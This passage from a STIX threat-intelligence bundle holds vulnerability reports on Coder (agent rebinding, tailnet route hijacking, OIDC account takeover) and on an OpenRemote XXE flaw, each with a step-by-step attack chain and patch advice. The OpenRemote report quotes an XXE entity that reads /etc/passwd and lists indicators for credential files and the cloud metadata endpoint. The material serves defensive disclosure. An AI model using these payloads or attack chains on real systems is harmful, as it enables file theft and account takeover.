      "source_ref": "report--bed96ad3-e6c9-5001-95f3-0786634345e0",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1696802d-dba5-532f-a7cb-c173677d00e8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bed96ad3-e6c9-5001-95f3-0786634345e0",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--bed96ad3-e6c9-5001-95f3-0786634345e0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Coder's Workspace App Vulnerability Allows Cross-Workspace Agent Rebinding",
      "description": "## Overview\n\nA critical authorization bypass vulnerability, identified as CVE-2026-55429, has been discovered in Coder's workspace application versions prior to v2.34.2, v2.33.8, v2.32.7, and v2.29.17. The flaw resides in the `UpsertWorkspaceApp` and `insertAgentApp` functions, which fail to properly verify ownership of an app ID during the `CompleteJob` payload processing. This allows an attacker with pre-existing elevated access, specifically as a template author or external provisioner operator, to rebind a victim's workspace application to their own malicious agent. First disclosed by Anthropic's Security Team, this vulnerability enables attackers to intercept and proxy a victim's IDE and terminal sessions, leading to unauthorized access, data exposure, and potential compromise of development environments. Defenders must prioritize upgrading their Coder instances to the patched versions immediately to mitigate this severe risk.\n\n## Attack Chain\n\n1.  **Attacker gains elevated access:** The attacker acquires \"template authorship\" or \"external provisioner operator\" privileges within the Coder environment, which is a prerequisite for exploitation.\n2.  **Victim app ID discovery:** The attacker uses the Coder public API to identify and obtain the unique UUID of a target victim's workspace application.\n3.  **Attacker creates malicious agent:** The attacker sets up their own workspace and agent, which will be used to intercept the victim's traffic.\n4.  **Craft `CompleteJob` payload:** The attacker constructs a `CompleteJob` payload containing the victim's discovered app UUID and their own malicious agent ID.\n5.  **Submit payload:** The attacker submits the crafted `CompleteJob` payload to the Coder system, leveraging their elevated provisioner permissions.\n6.  **Cross-workspace agent rebinding:** The `UpsertWorkspaceApp` function, vulnerable to the ID conflict, overwrites the `agent_id` associated with the victim's app UUID, reassigning it to the attacker's agent ID.\n7.  **Traffic interception:** Subsequent network traffic, including IDE and terminal sessions initiated by the victim for their workspace application, is transparently proxied to the attacker's workspace and agent.\n8.  **Session compromise:** The attacker can now monitor, control, and potentially exfiltrate data from the victim's development environment sessions, leading to unauthorized access and data compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-55429 allows an attacker with pre-existing elevated permissions to effectively hijack a victim's Coder workspace sessions. This means all activity within the victim's IDE and terminal, including sensitive data, code, credentials, and commands, can be monitored and manipulated by the attacker. This privilege escalation enables unauthorized access to intellectual property, potential insertion of malicious code, and broader compromise of development pipelines, affecting all users of vulnerable Coder instances across various sectors utilizing the platform for development environments.\n\n## Recommendation\n\n*   Prioritize patching all Coder instances to versions v2.34.2, v2.33.8, v2.32.7, or v2.29.17 to remediate CVE-2026-55429.\n*   Regularly review and limit permissions for \"template author\" and \"external provisioner operator\" roles to only essential personnel to reduce the attack surface for CVE-2026-55429.\n",
      "published": "2026-07-06T21:05:20Z",
      "labels": [
        "vulnerability",
        "privilege-escalation",
        "coder",
        "application"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-9rjw-3gwp-f59v"
        },
        {
          "source_name": "reference",
          "url": "CVE-2026-55429"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--06c109c8-8e07-5b04-b7b8-bf0681292f05",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Adversary-in-the-Middle",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1557",
          "url": "https://attack.mitre.org/techniques/T1557"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0258e772-d08d-5665-ac15-d04caf96a7bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a13da184-0305-5811-9392-f9df54063fb3",
      "target_ref": "attack-pattern--06c109c8-8e07-5b04-b7b8-bf0681292f05"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a13da184-0305-5811-9392-f9df54063fb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Coder Tailnet Vulnerability (CVE-2026-55428) Leads to Route Hijacking",
      "description": "## Overview\n\nA critical vulnerability, CVE-2026-55428, has been identified in Coder's tailnet coordinator, impacting all supported versions of Coder, including 2.34, 2.33, 2.32, and 2.29 (ESR) prior to their patched releases. The flaw stems from insufficient validation of agent-supplied `AllowedIPs`, allowing a malicious Coder agent to advertise arbitrary network prefixes. This enables the agent to hijack network traffic intended for other agents, intercepting web terminal and workspace application communications, and potentially serving spoofed content. Exploitation requires an authenticated user with a running workspace and a modified agent binary. This vulnerability could lead to significant data exposure, credential theft, or further compromise of an organization's development environment. The issue was independently disclosed by Anthropic's Security Team.\n\n## Attack Chain\n\n1.  An authenticated user gains access to a Coder environment and initiates a workspace.\n2.  The authenticated user modifies their Coder agent binary to include malicious functionality capable of manipulating `AllowedIPs` advertisements.\n3.  The malicious Coder agent connects to the Coder tailnet coordinator.\n4.  The malicious agent advertises arbitrary `AllowedIPs` prefixes, including the tailnet address of a target victim agent, to the coordinator.\n5.  Due to the vulnerability (CVE-2026-55428), the Coder coordinator, lacking proper validation, forwards these unverified `AllowedIPs` verbatim to other tunnel peers within the tailnet.\n6.  The other tunnel peers, receiving the malicious `AllowedIPs` configuration, install them into their WireGuard peer configurations, effectively re-routing traffic intended for the victim agent to the malicious agent.\n7.  The malicious agent then intercepts web terminal and workspace application traffic from the victim and can serve spoofed content, facilitating data exfiltration, credential harvesting, or further exploitation.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-55428 allows an attacker to perform a sophisticated Man-in-the-Middle attack within the Coder tailnet. This enables the interception of sensitive web terminal and workspace application traffic from other users or agents, potentially leading to the theft of credentials, session tokens, or proprietary data. Furthermore, the ability to serve spoofed content means attackers could phish users, deliver malicious updates, or otherwise compromise the integrity of the development environment. The vulnerability affects critical internal communication pathways, posing a severe risk to intellectual property and operational security for organizations utilizing vulnerable Coder versions.\n\n## Recommendation\n\n*   Immediately upgrade all affected Coder installations to the patched versions: Coder v2.34.2, v2.33.8, v2.32.7, or v2.29.17 to remediate CVE-2026-55428.\n*   Monitor Coder coordinator logs for any agents advertising unexpected `AllowedIPs` prefixes, as this could indicate an attempted or successful exploitation.\n*   Review network configurations to ensure that only trusted and authenticated agents are permitted to interact with the Coder tailnet coordinator.\n",
      "published": "2026-07-06T21:04:20Z",
      "labels": [
        "vulnerability",
        "cve",
        "route-hijacking",
        "network-attack",
        "supply-chain"
      ],
      "object_refs": [
        "attack-pattern--06c109c8-8e07-5b04-b7b8-bf0681292f05"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-wrq8-fcv5-8hvp"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f91dc1c0-6ed4-5602-8bde-4987cc9188d7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "filepath: /etc/passwd",
      "pattern": "[x-ti-bot:filepath = '/etc/passwd']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T20:59:11Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--64529a91-0c6c-57b8-9b74-c4f4667fbfb0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--69ad4723-3b24-5d84-8c8f-865236cebc60",
      "target_ref": "indicator--f91dc1c0-6ed4-5602-8bde-4987cc9188d7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0a270667-553c-5522-bc85-a94d4d8c6df5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "filepath: openmrs-runtime.properties",
      "pattern": "[x-ti-bot:filepath = 'openmrs-runtime.properties']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T20:59:11Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b7fb71f3-3e19-5bf1-98a0-280affcad117",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--69ad4723-3b24-5d84-8c8f-865236cebc60",
      "target_ref": "indicator--0a270667-553c-5522-bc85-a94d4d8c6df5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--668dbe08-7f88-57d4-8dda-d58c0d3c7641",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://169.254.169.254/...",
      "pattern": "[url:value = 'http://169.254.169.254/...']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T20:59:11Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7932cb81-b45c-556d-b728-99855dd5975a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--69ad4723-3b24-5d84-8c8f-865236cebc60",
      "target_ref": "indicator--668dbe08-7f88-57d4-8dda-d58c0d3c7641"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c0610f29-f92b-5176-91d3-480ed485472c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--69ad4723-3b24-5d84-8c8f-865236cebc60",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0ec6d28b-0f3e-57dd-a0a0-f12ad2b873ae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--69ad4723-3b24-5d84-8c8f-865236cebc60",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Transfer Data to Cloud Account",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1537",
          "url": "https://attack.mitre.org/techniques/T1537"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3707bad3-6cf4-5ebd-b79d-9c1549903a69",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--69ad4723-3b24-5d84-8c8f-865236cebc60",
      "target_ref": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Proxy",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1090",
          "url": "https://attack.mitre.org/techniques/T1090"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--34b1bd67-6016-511c-b593-21b0dbcdc1f6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--69ad4723-3b24-5d84-8c8f-865236cebc60",
      "target_ref": "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--69ad4723-3b24-5d84-8c8f-865236cebc60",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenRemote Incomplete Fix for XXE in KNXProtocol Leads to Arbitrary File Read (CVE-2026-54640)",
      "description": "## Overview\n\nOpenRemote, an open-source IoT platform, has an incomplete fix for a previously identified XML External Entity (XXE) vulnerability, CVE-2026-40882. The original patch for CVE-2026-40882 only secured the Velbus asset import handler, leaving the `KNXProtocol` handler vulnerable to arbitrary file read. Versions up to and including 1.24.1 of the `openremote-agent` module are affected by this newly identified vulnerability, tracked as CVE-2026-54640. An authenticated, non-administrative user can exploit this flaw by uploading a specially crafted ETS project ZIP file containing malicious XML. This allows attackers to read arbitrary files from the server's filesystem, including `/etc/passwd`, application configuration files with credentials, or even leverage Server-Side Request Forgery (SSRF) to access internal network resources or cloud metadata endpoints. This poses a significant risk to the confidentiality of sensitive data and can lead to further compromise of the OpenRemote instance and its underlying infrastructure.\n\n## Attack Chain\n\n1.  An authenticated, non-administrative attacker sends an HTTP POST request to the `/api/{realm}/agent/{agentId}/import` endpoint with a malicious ETS project ZIP file as `fileData`.\n2.  The OpenRemote `AgentResourceImpl.doProtocolAssetImport()` method receives the `fileData` and passes it to `KNXProtocol.startAssetImport()`.\n3.  `KNXProtocol` extracts the `0.xml` file from the attacker-controlled ZIP archive using a `ZipInputStream`.\n4.  The content of `0.xml` is processed by the Saxon `TransformerFactoryImpl.newTransformer()` and `transform()` methods without XXE protection, allowing external entities to be resolved.\n5.  Separately, `XMLInputFactory.newInstance().createXMLStreamReader()` also processes the `0.xml` content without XXE protection.\n6.  Both XML parsers resolve an external entity defined in the malicious `0.xml` (e.g., `\u003c!ENTITY xxe SYSTEM \"file:///etc/passwd\"\u003e`), leading to arbitrary file read.\n7.  The contents of the arbitrary file are returned to the attacker within the response of the import process or are processed in a way that allows exfiltration.\n8.  Successful exploitation results in the attacker obtaining sensitive information from the server filesystem or probing internal network resources via SSRF.\n\n## Impact\n\nThis vulnerability allows any authenticated user, even without administrative privileges, to read arbitrary files from the server filesystem. This includes critical system files like `/etc/passwd`, enabling user enumeration and reconnaissance. More significantly, it allows access to application configuration files (e.g., `openmrs-runtime.properties`) that might contain sensitive database credentials, API keys, or other secrets. The potential for Server-Side Request Forgery (SSRF) further broadens the attack surface, allowing attackers to query cloud provider metadata endpoints (e.g., `http://169.254.169.254/`) for cloud credentials or access internal services reachable from the vulnerable OpenRemote server. The vulnerability is present in a core protocol handler (`KNXProtocol`) shipped with the OpenRemote agent module, making all default installations running affected versions susceptible to this critical data exfiltration risk.\n\n## Recommendation\n\n*   **Patch CVE-2026-54640 immediately:** Upgrade the `io.openremote:openremote-agent` module to a version patched against CVE-2026-54640.\n*   **Review and audit configurations:** Conduct an audit of all OpenRemote instances to identify any running `openremote-agent` modules and verify their versions, applying the necessary updates.\n*   **Implement network segmentation:** Restrict network access to cloud metadata endpoints and internal services from OpenRemote servers to mitigate the impact of potential SSRF exploitation, as mentioned in the Impact section.\n*   **Enable webserver logging for API POST requests:** Implement detailed logging for POST requests to `/api/{realm}/agent/{agentId}/import` on your web servers (e.g., NGINX, Apache, IIS). Monitor for unusually large or malformed XML payloads within the fileData parameter that might indicate attempted XXE exploitation, although this may require deep packet inspection or WAF capabilities.\n*   **Apply WAF rules for XXE:** Configure your Web Application Firewall (WAF) to detect and block XML External Entity (XXE) injection attempts in XML content submitted to the affected `/api` endpoints, specifically looking for `\u003c!DOCTYPE` declarations containing `SYSTEM` or `PUBLIC` identifiers.\n",
      "published": "2026-07-06T20:59:11Z",
      "labels": [
        "xxe",
        "arbitrary-file-read",
        "ssrf",
        "openremote",
        "iot",
        "vulnerability",
        "incomplete-fix"
      ],
      "object_refs": [
        "indicator--f91dc1c0-6ed4-5602-8bde-4987cc9188d7",
        "indicator--0a270667-553c-5522-bc85-a94d4d8c6df5",
        "indicator--668dbe08-7f88-57d4-8dda-d58c0d3c7641",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663",
        "attack-pattern--af8a173c-24c5-549d-93d6-e942357a5af7"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-7v6w-c3f4-9wpq"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--da14297f-f158-5957-bf2d-a4d79b2724ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--60ca33b1-4315-517f-b953-2d3c235231df",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7ebc52cb-032c-551f-a94a-b6f9d588c9e0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--60ca33b1-4315-517f-b953-2d3c235231df",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3e8c6f6d-0eaf-53da-aa61-7e65baf33865",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--60ca33b1-4315-517f-b953-2d3c235231df",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--60ca33b1-4315-517f-b953-2d3c235231df",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Coder OIDC email_verified Type Coercion Bypass (CVE-2026-55076)",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2026-55076, has been identified in Coder's platform, affecting versions prior to 2.34.2, 2.33.8, 2.32.7, and 2.29.17. The flaw resides in how Coder's OpenID Connect (OIDC) callback processes the `email_verified` claim from an Identity Provider (IdP). Instead of robust type coercion, Coder used a direct Go `bool` type assertion. This meant that if an IdP returned `email_verified` as a non-boolean value (e.g., the string `\"false\"`) or omitted the claim entirely, Coder's system would incorrectly default to treating the email as verified. This misinterpretation, combined with an unconditional email-based account fallback feature, created a pathway for unauthenticated account takeover, enabling attackers to gain full control over a victim's existing Coder account without requiring prior authentication.\n\n## Attack Chain\n\n1.  **Initial Account Registration**: The victim legitimately registers and creates an account on a Coder instance, likely linked to their corporate email address.\n2.  **Attacker IdP Setup**: The attacker registers an OpenID Connect (OIDC) Identity Provider (IdP) and configures it to impersonate the victim's email address.\n3.  **IdP Claim Manipulation**: The attacker's IdP is configured to either omit the `email_verified` claim or return it as a non-boolean string (e.g., `\"false\"`) during an authentication response.\n4.  **OIDC Authentication Attempt**: The attacker initiates an OIDC login attempt to the target Coder instance, selecting their malicious IdP.\n5.  **Type Coercion Bypass**: Coder's OIDC callback receives the IdP response and, due to the vulnerability, incorrectly processes the `email_verified` claim (or its absence) as verified.\n6.  **Account Fallback Activation**: Coder's unconditional email-based account fallback mechanism matches the (falsely) verified email from the IdP to the victim's existing Coder account.\n7.  **Session Establishment**: Coder grants the attacker a valid session for the victim's account, resulting in a full account takeover.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-55076 allows for complete account takeover of any existing Coder user. An attacker does not need prior authentication to the Coder instance. This means sensitive data, project code, and system configurations associated with the compromised account become fully accessible to the attacker. While no specific victim count or targeted sector is provided, Coder is widely used for development environments, meaning a wide range of organizations and intellectual property could be at risk. The direct result is unauthorized access to development infrastructure and potential lateral movement within an organization's ecosystem.\n\n## Recommendation\n\n*   **Patch CVE-2026-55076 immediately** by upgrading your Coder instance to version 2.34.2, 2.33.8, 2.32.7, or 2.29.17 as described in the brief.\n*   **Review IdP configurations**: Ensure your Identity Provider (IdP) for OIDC returns the `email_verified` claim as a native JSON boolean (`true` or `false`) to mitigate risks in case of other application vulnerabilities.\n",
      "published": "2026-07-06T20:58:08Z",
      "labels": [
        "account-takeover",
        "oidc",
        "vulnerability",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-75vm-6w67-gwvp"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/coder/coder/releases/tag/v2.34.2"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/coder/coder/releases/tag/v2.33.8"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/coder/coder/releases/tag/v2.32.7"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/coder/coder/releases/tag/v2.29.17"
        },
        {
          "source_name": "reference",
          "url": "CVE-2026-55076"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--172b34ab-9a1a-5553-b21d-4d9068c60fe6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b1d31564-06d0-54bd-a23d-b9b7a1e398f6",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1098",
          "url": "https://attack.mitre.org/techniques/T1098"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--25d7f7a1-1267-5984-bef2-6ef1066ae091",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b1d31564-06d0-54bd-a23d-b9b7a1e398f6",
      "target_ref": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b1d31564-06d0-54bd-a23d-b9b7a1e398f6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Coder OIDC Account Takeover Vulnerabilities (CVE-2026-55075)",
      "description": "## Overview\n\nCVE-2026-55075 describes two critical vulnerabilities discovered in Coder's OpenID Connect (OIDC) login process, publicly disclosed in July 2026 by Anthropic's Security Team. The first flaw involves email-based user matching, which would link a Coder account to an OIDC identity based solely on a matching email address, even if an existing link to a different Identity Provider (IdP) subject was present. The second flaw permits bypassing the `email_verified` claim, where the system incorrectly treated an absent or non-boolean `email_verified` claim as verified. Chaining these issues allows an attacker controlling a matching email address at the OIDC provider to log in as a victim Coder user, gaining full access to their development workspaces, templates, and resources. This vulnerability specifically targets Coder installations configured with OIDC authentication, affecting versions prior to `v2.29.17` and specific ranges within the `2.30.x`, `2.33.x`, and `2.34.x` series.\n\n## Attack Chain\n\n1.  Attacker identifies a Coder instance configured to use OIDC authentication.\n2.  Attacker discovers a victim's email address registered with a Coder account on the target instance.\n3.  Attacker registers or takes control of an account at the configured OIDC provider using the victim's email address.\n4.  Attacker initiates an OIDC login flow to the vulnerable Coder instance, authenticating via their controlled OIDC provider account.\n5.  The OIDC provider issues an ID Token to the attacker, where the `email_verified` claim is either absent or has a non-boolean value.\n6.  The vulnerable Coder instance processes the ID Token, but due to CVE-2026-55075, it bypasses the `email_verified` check and performs user matching based solely on the email address.\n7.  The Coder instance incorrectly links the attacker's OIDC identity to the victim's existing Coder account.\n8.  The attacker is granted full access to the victim's Coder account, including workspaces, templates, and resources.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-55075 leads to complete account takeover within the affected Coder environment. An attacker gains full administrative access to the victim's Coder workspaces, templates, and any associated resources, including access to sensitive code, development environments, and potentially integrated systems. This could lead to data exfiltration, intellectual property theft, code manipulation, or further lateral movement within an organization's development infrastructure. The prerequisites for this attack include the use of OIDC authentication, the attacker's ability to control an email address at the IdP matching the victim's Coder account, and the victim's account not already being linked to a different IdP subject.\n\n## Recommendation\n\n*   Immediately patch all Coder installations to the recommended versions to address CVE-2026-55075: `v2.34.2`, `v2.33.8`, `v2.32.7`, or `v2.29.17`.\n*   As a temporary workaround for CVE-2026-55075, configure your OIDC provider to disallow self-registration of user accounts.\n*   As an additional temporary workaround for CVE-2026-55075, ensure your OIDC provider is configured to strictly require email verification before issuing ID Tokens for user accounts.\n",
      "published": "2026-07-06T20:57:10Z",
      "labels": [
        "oidc",
        "account-takeover",
        "vulnerability",
        "coder",
        "cloud"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-9r87-mvcw-x35f"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6e4d4fd7-3420-5308-92e6-757c70fa87dc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2b2fdedc-0e9d-50b7-8ee9-29ea34da335f",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2b2fdedc-0e9d-50b7-8ee9-29ea34da335f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Coder User-Admin Role Can Reset Owner Account Password (CVE-2026-55077)",
